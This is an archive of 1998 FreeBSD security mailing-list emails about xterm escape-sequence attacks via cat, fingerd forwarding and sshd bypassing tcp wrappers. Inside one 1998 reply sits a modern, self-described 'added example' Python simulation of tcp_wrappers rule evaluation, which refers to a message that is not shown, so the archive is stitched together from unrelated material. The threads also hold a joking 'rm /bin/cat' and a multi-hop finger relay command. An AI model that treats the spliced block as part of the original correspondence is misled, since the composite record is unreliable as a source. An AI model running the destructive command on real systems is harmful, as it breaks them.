Received: from na.nu.na.nu (bofh.fast.net.uk [194.207.104.22]) by ns0.fast.net.uk (8.9.0/8.8.7) with ESMTP id JAA15353 for ; Fri, 11 Sep 1998 09:09:45 +0100 (BST)
Received: from bofh.fast.net.uk (bofh.fast.net.uk [194.207.104.22]) by na.nu.na.nu (8.8.8/8.8.8) with SMTP id JAA04271 for ; Fri, 11 Sep 1998 09:09:43 +0100 (BST) (envelope-from netadmin@fastnet.co.uk)
Date: Fri, 11 Sep 1998 09:09:43 +0100 (BST)
From: Jay Tribick
X-Sender: netadmin@bofh.fast.net.uk
To: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

| > >How about something more practical? Like being able to turn off this
| > >"feature".
| >
| > "rm /bin/cat"

  ^- Not very practical, it would break a lot of scripts

| Cat has little to do with the issue under discussion, despite the
| subject line. Escape sequences can come from talk requests, naive
| write(1)-like programs or naive network clients (I have seen the first
| two, and the third is likely).
|
| Unless I missed it, nobody has defended the xterm feature in question on
| any basis except that that's how it's always been done. I also didn't
| notice any reports of recent exploits.
|
| I'd like to hear a wider variety of opinions on the matter -- in
| particular, I wonder if anyone still uses the feature for anything, and
| if it's been exploited. I don't understand why you're so dismissive
| about it.

I think we've had enough replies on this thread - I still think it /may/
be exploitable if you had a . in your path and within the tarball was a
file called xtermxterm.. but, let's drop it here before it gets out of
hand :)

Anyone who wants to reply to this, do it privately please.

Regards,

Jay Tribick

--
[| Network Admin | FastNet International | http://fast.net.uk/ |]
[| Finger netadmin@fastnet.co.uk for contact info & PGP PubKey |]
[| +44 (0)1273 T: 677633 F: 621631 e: netadmin@fast.net.uk |]

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 02:51:29 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA10620 for freebsd-security-outgoing; Fri, 11 Sep 1998 02:51:29 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA10615 for ; Fri, 11 Sep 1998 02:51:20 -0700 (PDT) (envelope-from ark@eltex.ru)
From: ark@eltex.ru
Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id NAA02658; Fri, 11 Sep 1998 13:50:38 +0400 (MSD)
Received: from paranoid.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with ESMTP id NAA03566; Fri, 11 Sep 1998 13:50:42 +0400 (MSD)
Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id NAA04779; Fri, 11 Sep 1998 13:50:28 +0400
Date: Fri, 11 Sep 1998 13:50:28 +0400
Message-Id: <199809110950.NAA04779@paranoid.eltex.spb.ru>
In-Reply-To: from "Steve Reid "
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: cat exploit
To: sreid@alpha.sea-to-sky.net
Cc: netadmin@fastnet.co.uk, security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

Can't remember the exact control sequence details, but AFAIR it is
possible for xterm to a) set the window title to whatever you want and
b) get it back as a response.

Steve Reid said :

> I tried it several times and I couldn't get it to produce anything
> other than "1;2c" and "xterm", although it did completely freeze my
> xterm once (scrollbars didn't even work).
>
> It never seemed to embed an enter character. I have, on occasion, cat'ed
> a file and seen the "zsh: command not found: xtermxtermxterm" but I
> think that was caused by me typing ahead without noticing the extra
> garbage on the command line.
>
> In any case, it looks like the worst that could happen is that a binary
> named with some combination of those strings could be executed, IF IT IS
> IN YOUR PATH. I can't think of any "evil" command that can be built
> using just those strings.

 _ _ _ _ _ _ _                       {::} {::} {::}  CU in Hell
_| o |_ | | _|| | / _||_| |_ |_ |_   (##) (##) (##)  /Arkan#iD
|_ o _||_| _||_| / _| | o |_||_||_|  [||] [||] [||]  Do i believe in Bible? Hell,man,i've seen one!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNfjyY6H/mIJW9LeBAQFW6wQAs1tNY621k24Trk7y1kCx8wOHBCLVAYQ5
ym9GUsSpBd/y4brSRODb8F4bABYTeNG7/gD6pzf+/x5eh7UOUbdNPKctGQmbW+Jk
lz9oNsJ8ij6jweRIPkQcTLB5rsWk/oXd7tO0wWK312g5uF5pQ3voR0/hrspGssId
qWqvGTSXLsc=
=1x9r
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 03:08:45 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA12370 for freebsd-security-outgoing; Fri, 11 Sep 1998 03:08:45 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA12365 for ; Fri, 11 Sep 1998 03:08:41 -0700 (PDT) (envelope-from ark@eltex.ru)
From: ark@eltex.ru
Received: from eltex.ru (eltex-spiiras.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id OAA02788; Fri, 11 Sep 1998 14:07:01 +0400 (MSD)
Received: from paranoid.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with ESMTP id OAA03682; Fri, 11 Sep 1998 14:07:05 +0400 (MSD)
Received: (from ark@localhost) by paranoid.eltex.spb.ru (8.8.8/8.7.3) id OAA04817; Fri, 11 Sep 1998 14:06:54 +0400
Date: Fri, 11 Sep 1998 14:06:54 +0400
Message-Id: <199809111006.OAA04817@paranoid.eltex.spb.ru>
In-Reply-To: <19980910180956.A2858@mcs.net> from "Karl Denninger "
Organization: "Klingon Imperial Intelligence Service"
Subject: Re: terminal escape exploit (was Re: cat exploit)
To: karl@denninger.net
Cc: Studded@dal.net, Michael@paranoid.eltex.spb.ru, Richards@paranoid.eltex.spb.ru, <026809r@dragon.acadiau.ca>, security@FreeBSD.ORG
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

-----BEGIN PGP SIGNED MESSAGE-----

nuqneH,

Oh really? AFAIR the VT52 was too dumb and had no programmable keys, and
the only responses you could get back from it were the screen cursor
position and some simple status info. You need a VT100 at least.

VT52 clones were much more widespread in communist bloc countries than in
the rest of the world, where they were quickly phased out by the VT100 and
higher models. ;)

Karl Denninger said :

> The problem is TERMINALS.
>
> You can't bitch that an EMULATOR does exactly what it is claimed to do -
> emulate the REAL DEVICE.
>
> This "exploit" is so old its crusty; it is quite possible to do this on a
> VT-52 (yes, a real Vt-52, you know those terminals that weighed about 100
> lbs, had a dinky little screen, were made by DEC and haven't been seen in
> some 15 years? Yes, those.)

 _ _ _ _ _ _ _                       {::} {::} {::}  CU in Hell
_| o |_ | | _|| | / _||_| |_ |_ |_   (##) (##) (##)  /Arkan#iD
|_ o _||_| _||_| / _| | o |_||_||_|  [||] [||] [||]  Do i believe in Bible? Hell,man,i've seen one!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: noconv

iQCVAwUBNfj2PaH/mIJW9LeBAQGF5QP+Kh5fqocnfLrNeadq9z1/2f06Vw6tDvUq
USaLykrpRg/v0a0E5EhNnmmwWFkHzw7bLT55osOKr9FmUmiaTZTymZ+CLlRhpfv1
BCyt85OJbtHOIxP0ZJ5DcOsZ+ZAn7r6+LZvxKni8E6gURtdOARhCbR1xvbjMr6PE
3+o9MGS5mLQ=
=dzdt
-----END PGP SIGNATURE-----

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 03:28:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA14022 for freebsd-security-outgoing; Fri, 11 Sep 1998 03:28:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from office.omc.net (office.omc.net [195.185.142.22]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA14017 for ; Fri, 11 Sep 1998 03:28:56 -0700 (PDT) (envelope-from LutzRab@omc.net)
Received: from lutz (lutz.omc.net [195.185.142.3]) by office.omc.net (8.9.1/8.9.1) with SMTP id MAA04513 for ; Fri, 11 Sep 1998 12:29:24 +0200 (CEST)
Message-Id: <199809111029.MAA04513@office.omc.net>
From: "Lutz Rabing"
Organization: OMCnet IS GmbH
To: security@FreeBSD.ORG
Date: Fri, 11 Sep 1998 12:30:33 +0200
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Content-transfer-encoding: 7BIT
Subject: fingerd exploit
Reply-to: LutzRab@omc.net
References:
In-reply-to:
X-mailer: Pegasus Mail for Win32 (v3.01b)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Has anybody heard of a fingerd exploit?

I found many fingerd log messages from many different destinations on one
of our webservers, which is unusual. There were even 10 fingerds running
under uid 'nobody'. (fingerd has been disabled by now)

Thanks,
Lutz Rabing -OMCnet-

With kind regards,
Lutz Rabing -OMCnet-

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 07:14:54 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id HAA05427 for freebsd-security-outgoing; Fri, 11 Sep 1998 07:14:54 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from ns1.seidata.com (ns1.seidata.com [208.10.211.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id HAA05422 for ; Fri, 11 Sep 1998 07:14:53 -0700 (PDT) (envelope-from mike@seidata.com)
Received: from localhost (mike@localhost) by ns1.seidata.com (8.8.8/8.8.5) with SMTP id KAA01648; Fri, 11 Sep 1998 10:17:31 -0400 (EDT)
Date: Fri, 11 Sep 1998 10:17:31 -0400 (EDT)
From: Mike
To: Lutz Rabing
cc: security@FreeBSD.ORG
Subject: Re: fingerd exploit
In-Reply-To: <199809111029.MAA04513@office.omc.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Lutz Rabing wrote:

> Has anybody heard of a fingerd exploit ?

Yes and no... I haven't heard of an 'exploit', but I have heard
conversations about finger oddities... namely I've overheard people
discussing 'odd behavior on the part of finger'. I, unfortunately,
don't have much more information. The oddity did relate to multiple
instances of fingerd (as you report), I believe...

Do you run the vanilla finger or a variant such as secure finger?

-mike

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 10:30:46 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA01473 for freebsd-security-outgoing; Fri, 11 Sep 1998 10:30:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from colin.muc.de (colin.muc.de [193.174.4.1]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id KAA01453 for ; Fri, 11 Sep 1998 10:30:37 -0700 (PDT) (envelope-from lutz@muc.de)
Received: from tavari.muc.de ([193.174.4.22]) by colin.muc.de with SMTP id <140576-1>; Fri, 11 Sep 1998 18:02:03 +0200
Received: (from daemon@localhost) by tavari.muc.de (8.8.8/8.8.7) id SAA08916; Fri, 11 Sep 1998 18:00:50 +0200 (CEST)
Received: from ripley(192.168.42.202) by morranon via smap (V2.1) id xma008914; Fri, 11 Sep 98 18:00:43 +0200
From: "Lutz Albers"
To: "Graphic Rezidew" ,
Subject: RE: sshd
Date: Fri, 11 Sep 1998 18:00:37 +0200
Message-ID: <000001bddd9d$51214220$ca2aa8c0@ripley.tavari.muc.de>
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0
In-Reply-To: <35F8BF78.4C32DBEF@rezidew.net>
X-MimeOLE: Produced By Microsoft MimeOLE V4.72.2106.4
Importance: Normal
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

>ok, now I am just a little bit concerned about this ( maybe I'm over looking something
>that's REALLY obvious) . I installed the ssh port from 2.2.5 I had set up tcp wrappers
>and noticed that none of the rules for ssh were working so I took the line for it out
>of /etc/inetd.conf. The next day I noticed that a 'netstat -a' revealed that sshd was
>running on port 22 of my machine. I have done "grep ssh /etc/*" and come
>back with only

As others have told you, sshd is normally started as a stand-alone daemon.
If you do a man sshd, you'll find the following option:

     -i      Specifies that sshd is being run from inetd.  Sshd is normally
             not run from inetd because it needs to generate the server key
             before it can respond to the client, and this may take tens of
             seconds.  Clients would have to wait too long if the key was
             regenerated every time.  However, with small key sizes (e.g.
             512) using sshd from inetd may be feasible

hope this helps ...

--
Lutz Albers, lutz@muc.de, pgp key available from
Do not take life too seriously, you will never get out of it alive.
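The problem quoted at the top of this message (tcp wrappers rules for ssh "not working") and Jordan Hubbard's answer earlier in the thread (the FreeBSD port of tcpd reads /usr/local/etc/hosts.allow and hosts.deny, not /etc) come down to one property of hosts_access(5): a control file tcpd cannot open is treated as empty, and when neither file yields a match the connection is permitted. Rules written to a path tcpd never reads therefore fail open, silently. The Python below is an added example written for this page, not FreeBSD or tcp_wrappers code. It re-implements a subset of the hosts_access(5) pattern language (ALL, LOCAL, EXCEPT, exact host or address, leading-dot domain suffix, trailing-dot address prefix, net/mask) and the allow-then-deny evaluation order, so the misplaced-file case can be exercised offline. The sample policy, the client records and the directory names in `misplaced_files_demo` are constructed for illustration; KNOWN, UNKNOWN, PARANOID and the optional shell_command field are not modelled.

```python
"""Simulate tcpd's hosts_access(5) decision for one (daemon, client) pair.

Added example for this thread; a subset re-implementation, not the
tcp_wrappers or FreeBSD code.  Sample data below is constructed.
"""
import ipaddress
import os
import tempfile


def parse_rules(text):
    """Return [(daemon_patterns, client_patterns)] from hosts.allow/hosts.deny text.

    Blank lines and lines starting with '#' are ignored; a trailing backslash
    joins the next line.  A third ':' field (shell_command) is not modelled.
    """
    rules, pending = [], ""
    for raw in text.splitlines():
        line = pending + raw.rstrip()
        pending = ""
        if line.endswith("\\"):
            pending = line[:-1]
            continue
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue                      # malformed: tcpd logs it and moves on
        rules.append((fields[0].split(), fields[1].split()))
    return rules


def list_match(patterns, item, match_one):
    """hosts_access list semantics: 'a EXCEPT b EXCEPT c' means a EXCEPT (b EXCEPT c)."""
    if "EXCEPT" in patterns:
        i = patterns.index("EXCEPT")
        return (list_match(patterns[:i], item, match_one)
                and not list_match(patterns[i + 1:], item, match_one))
    return any(match_one(p, item) for p in patterns)


def daemon_match(pattern, daemon):
    return pattern == "ALL" or pattern == daemon


def client_match(pattern, client):
    """client is {'host': name, 'addr': dotted quad}, as tcpd sees the peer."""
    host, addr = client["host"], client["addr"]
    if pattern == "ALL":
        return True
    if pattern == "LOCAL":                # a host name without a dot
        return "." not in host
    if pattern.startswith("."):           # .example.net
        return host.endswith(pattern)
    if pattern.endswith("."):             # 192.0.2.
        return addr.startswith(pattern)
    if "/" in pattern:                    # net/mask, e.g. 192.0.2.0/255.255.255.0
        try:
            return ipaddress.ip_address(addr) in ipaddress.ip_network(pattern, strict=False)
        except ValueError:
            return False
    return pattern == host or pattern == addr


def hosts_access(daemon, client, allow_text, deny_text):
    """tcpd order: first hosts.allow match grants, then first hosts.deny match
    denies, otherwise access is granted."""
    for dlist, clist in parse_rules(allow_text):
        if list_match(dlist, daemon, daemon_match) and list_match(clist, client, client_match):
            return True
    for dlist, clist in parse_rules(deny_text):
        if list_match(dlist, daemon, daemon_match) and list_match(clist, client, client_match):
            return False
    return True


def read_control_file(path):
    """tcpd treats a control file it cannot open as empty."""
    try:
        with open(path) as f:
            return f.read()
    except OSError:
        return ""


def decide_from_dir(daemon, client, control_dir):
    """Evaluate the hosts.allow/hosts.deny found in the directory tcpd was built to read."""
    allow = read_control_file(os.path.join(control_dir, "hosts.allow"))
    deny = read_control_file(os.path.join(control_dir, "hosts.deny"))
    return hosts_access(daemon, client, allow, deny)


# Constructed sample policy: sshd only from the office net and one domain, all else denied.
SAMPLE_ALLOW = "sshd : 192.0.2.0/255.255.255.0 .example.net EXCEPT guest.example.net\n"
SAMPLE_DENY = "ALL : ALL\n"
OUTSIDER = {"host": "scan.example.org", "addr": "203.0.113.5"}


def misplaced_files_demo():
    """Write the policy where the admin expected it and point the simulated tcpd
    elsewhere.  Returns (decision when tcpd reads the right directory,
    decision when it reads the wrong one) for an outside host."""
    with tempfile.TemporaryDirectory() as root:
        admin_dir = os.path.join(root, "etc")                  # where the rules were written
        tcpd_dir = os.path.join(root, "usr", "local", "etc")   # where this tcpd looks
        os.makedirs(admin_dir)
        with open(os.path.join(admin_dir, "hosts.allow"), "w") as f:
            f.write(SAMPLE_ALLOW)
        with open(os.path.join(admin_dir, "hosts.deny"), "w") as f:
            f.write(SAMPLE_DENY)
        return (decide_from_dir("sshd", OUTSIDER, admin_dir),
                decide_from_dir("sshd", OUTSIDER, tcpd_dir))


if __name__ == "__main__":
    print("rules where tcpd reads them / rules misplaced:", misplaced_files_demo())
```

The second value returned by `misplaced_files_demo` is the behaviour the original poster saw: with both control files missing from tcpd's point of view, every client is admitted, and no error is logged because an absent file is a legitimate configuration. The real tcpdmatch(8) shipped with tcp_wrappers performs this same dry run against the installed files and is the quickest way to confirm which directory a given build consults.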
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 10:47:30 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA03776 for freebsd-security-outgoing; Fri, 11 Sep 1998 10:47:30 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from naserv.gdl.iteso.mx (ns.iteso.mx [148.201.1.1]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA03771 for ; Fri, 11 Sep 1998 10:47:28 -0700 (PDT) (envelope-from cacho@naserv.gdl.iteso.mx)
Received: (from cacho@localhost) by naserv.gdl.iteso.mx (8.9.0/8.9.0) id MAA07789; Fri, 11 Sep 1998 12:46:58 -0500 (CDT)
Date: Fri, 11 Sep 1998 12:46:57 -0500 (CDT)
From: Hector Gonzalez Jaime
To: Mike
cc: Lutz Rabing , security@FreeBSD.ORG
Subject: Re: fingerd exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Maybe it has something to do with a message in bugtraq (like a month ago)
about finger forwarding? It affected Solaris/SunOS, and it has something
to do with fingerd allowing you to do this:

finger user@host.one@host.two@host.three@so.on

FreeBSD's fingerd lets you do this one, don't know if it hurts or not.

On Fri, 11 Sep 1998, Mike wrote:

> On Fri, 11 Sep 1998, Lutz Rabing wrote:
>
> > Has anybody heard of a fingerd exploit ?
>
> Yes and no... I haven't heard of an 'exploit', but I have heard
> conversations about finger oddities... namely I've overheard people
> discussing 'odd behavior on the part of finger'. I, unfortunately,
> don't have much more information. The oddity did relate to multiple
> instances of fingerd (as you report), I believe...
>
> Do you run the vanilla finger or a variant such as secure finger?
>
> -mike
>
>
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-security" in the body of the message
>

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 11:26:25 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09624 for freebsd-security-outgoing; Fri, 11 Sep 1998 11:26:25 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from Amnesiac.123.org (Amnesiac.mtl.pl [195.116.4.13]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA09616 for ; Fri, 11 Sep 1998 11:26:12 -0700 (PDT) (envelope-from mcl@mtl.pl)
Received: from Amnesiac.mtl.pl (mcl@Amnesiac.mtl.pl [195.116.4.13]) by Amnesiac.123.org (8.9.1/8.9.0) with SMTP id UAA18781; Fri, 11 Sep 1998 20:25:33 +0200 (CEST)
Date: Fri, 11 Sep 1998 20:25:33 +0200 (CEST)
From: Michal Listos
X-Sender: mcl@Amnesiac.123.org
To: Hector Gonzalez Jaime
cc: security@FreeBSD.ORG
Subject: Re: fingerd exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Hector Gonzalez Jaime wrote:

> Maybe it has something to do with a message in bugtraq (like a month ago)
> about finger forwarding? It affected Solaris/SunOS, and it has something
> to do with fingerd allowing you to do this:
>
> finger user@host.one@host.two@host.three@so.on
>
> FreeBSD's fingerd lets you do this one, don't know if it hurts or not.

From FreeBSD's fingerd manual page:

     -s      Enable secure mode.  Queries without a user name are rejected and
             forwarding of queries to other remote hosts is denied.

Michal

* Reincarnation: Life sucks, then you die. Then life sucks again.

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 12:44:00 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA25455 for freebsd-security-outgoing; Fri, 11 Sep 1998 12:44:00 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from alpha.sea-to-sky.net (alpha.sea-to-sky.net [204.244.200.240]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA25404 for ; Fri, 11 Sep 1998 12:43:39 -0700 (PDT) (envelope-from sreid@alpha.sea-to-sky.net)
Received: (from sreid@localhost) by alpha.sea-to-sky.net (8.9.1a/8.8.7) id MAA09852; Fri, 11 Sep 1998 12:41:20 -0700
Date: Fri, 11 Sep 1998 12:41:19 -0700 (PDT)
From: Steve Reid
To: "Jordan K. Hubbard"
cc: security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To: <18171.905461424@time.cdrom.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 10 Sep 1998, Jordan K. Hubbard wrote:

> Again, what I actually said was "don't blindly cat it to your screen"
> which is a perfectly valid point. If you want something which
> protects you, use more or less as many others have suggested.

Are ftp, telnet, rlogin, rsh, and ssh safe? What about pine, elm, mutt,
mh, biff, etc?

Does every program that displays data from an untrusted system have the
necessary protections against terminal bombs?

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 14:21:58 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA12232 for freebsd-security-outgoing; Fri, 11 Sep 1998 14:21:58 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from stage1.thirdage.com (stage1.ThirdAge.com [204.74.82.151]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA12222 for ; Fri, 11 Sep 1998 14:21:53 -0700 (PDT) (envelope-from jal@ThirdAge.com)
Received: from gigi (gigi.ThirdAge.com [204.74.82.169]) by stage1.thirdage.com (8.8.5/8.8.5) with SMTP id OAA22328; Fri, 11 Sep 1998 14:17:17 -0700 (PDT)
Message-Id: <3.0.5.32.19980911142102.009c86d0@204.74.82.151>
X-Sender: jal@204.74.82.151
X-Mailer: QUALCOMM Windows Eudora Pro Version 3.0.5 (32)
Date: Fri, 11 Sep 1998 14:21:02 -0700
To: Jay Tribick , security@FreeBSD.ORG
From: Jamie Lawrence
Subject: Re: cat exploit
Cc: Snob Art Genre
In-Reply-To:
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

At 09:09 AM 9/11/98 +0100, Jay Tribick wrote:
>
>| > >How about something more practical? Like being able to turn off this
>| > >"feature".
>| >
>| > "rm /bin/cat"
>
> ^- Not very practical, it would break a lot of scripts

Sigh. Most people noticed that I was being flip.

>| I'd like to hear a wider variety of opinions on the matter -- in
>| particular, I wonder if anyone still uses the feature for anything, and
>| if it's been exploited. I don't understand why you're so dismissive
>| about it.

I'm dismissive of it because the behaviour has been known for a very,
very long time. It is defined behaviour, and no worse than a lot of other
gotchas that exist in *nix. I thought everyone learned about this by
having someone else annoy them with ^Gs until they figured it out. Guess
not.

>I think we've had enough replies on this thread - I still think it
>/may/ be exploitable if you had a . in your path and within the
>tarball was a file called xtermxterm.. but, let's drop it here
>before it gets out of hand :)

It is 'exploitable' in ways that have nothing to do with your $PATH. Much
in the same way shells are 'exploitable' because you can compromise
someone's account by convincing them to run an arbitrary script you wrote
(only more obscurely so).

>Anyone wants to reply to this, do it privately please.

I would have, if there hadn't been misconceptions to be cleared up.

-j

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 15:18:13 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA19059 for freebsd-security-outgoing; Fri, 11 Sep 1998 15:18:13 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from fledge.watson.org (COPLAND.CODA.CS.CMU.EDU [128.2.222.48]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA19054 for ; Fri, 11 Sep 1998 15:18:11 -0700 (PDT) (envelope-from robert@cyrus.watson.org)
Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id SAA09838; Fri, 11 Sep 1998 18:17:30 -0400 (EDT)
Date: Fri, 11 Sep 1998 18:17:30 -0400 (EDT)
From: Robert Watson
X-Sender: robert@fledge.watson.org
Reply-To: Robert Watson
To: Steve Reid
cc: "Jordan K. Hubbard" , security@FreeBSD.ORG
Subject: Re: cat exploit
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Fri, 11 Sep 1998, Steve Reid wrote:

> On Thu, 10 Sep 1998, Jordan K. Hubbard wrote:
> > Again, what I actually said was "don't blindly cat it to your screen"
> > which is a perfectly valid point. If you want something which
> > protects you, use more or less as many others have suggested.
>
> Are ftp, telnet, rlogin, rsh, and ssh safe? What about pine, elm, mutt,
> mh, biff, etc?
>
> Does every program that displays data from an untrusted system have the
> necessary protections against terminal bombs?

Yes. And I think you'll find that most of these programs already do
provide this service. Certainly tools like 'biff' have long since been
fixed against this.

Consider this to be a denial of service attack -- that is, there is a
desire to have terminal-based services, and there is a desire to prevent
them from being abused. Some services have long since been removed (like
the ability to configure key bindings). Others have immediate uses --
mouse support, changing the title of your xterm, the ability to discover
terminal type without asking the user every time they log in or start a
terminal. Life without terminal interaction between the terminal and the
interactive terminal program isn't all that much fun. I like that
programs can retrieve the size of the current xterm, or take advantage of
mouse buttons.

However, to address these issues, it sounds like someone should submit a
patch to the X consortium and to XFree86 adding a new xterm option to
disable this. I use more, and rely on my set of applications to provide
filtering, so I am not a prime candidate here.
Keep in mind also that this option should not be the default, as it
breaks existing functionality that is not, by itself, insecure.

  Robert N Watson

robert@fledge.watson.org              http://www.watson.org/~robert/
Carnegie Mellon University            http://www.cmu.edu/
TIS Labs at Network Associates, Inc.  http://www.tis.com/
SafePort Network Services             http://www.safeport.com/

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 11 15:42:59 1998
Return-Path:
Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA22007 for freebsd-security-outgoing; Fri, 11 Sep 1998 15:42:59 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG)
Received: from rover.village.org (rover.village.org [204.144.255.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id PAA22000 for ; Fri, 11 Sep 1998 15:42:57 -0700 (PDT) (envelope-from imp@village.org)
Received: from harmony [10.0.0.6] by rover.village.org with esmtp (Exim 1.71 #1) id 0zHbtc-00070y-00; Fri, 11 Sep 1998 16:42:28 -0600
Received: from harmony.village.org (localhost.village.org [127.0.0.1]) by harmony.village.org (8.9.1/8.8.3) with ESMTP id QAA17684; Fri, 11 Sep 1998 16:42:32 -0600 (MDT)
Message-Id: <199809112242.QAA17684@harmony.village.org>
To: ark@eltex.ru
